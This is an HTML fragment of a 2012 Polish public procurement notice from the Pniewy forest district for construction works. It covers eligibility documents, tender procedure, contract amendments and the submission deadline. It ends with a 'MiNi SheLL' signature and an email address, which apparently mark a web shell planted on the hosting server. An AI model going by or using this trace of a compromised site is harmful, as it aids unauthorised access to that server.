<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzajace że roboty wykazane w wykazie robót zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Brak</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Każda zmiana 
i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści umowy - załącznik nr 4 zmiany umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy. Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pniewy.poznan.lasy.gov.pl/index.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Pniewy
ul. Wolności 4
62-045 Pniewy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2012 godzina 09:00, miejsce: Nadleśnictwo Pniewy
ul. Wolności 4
62-045 Pniewy 
Pojój nr 1 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com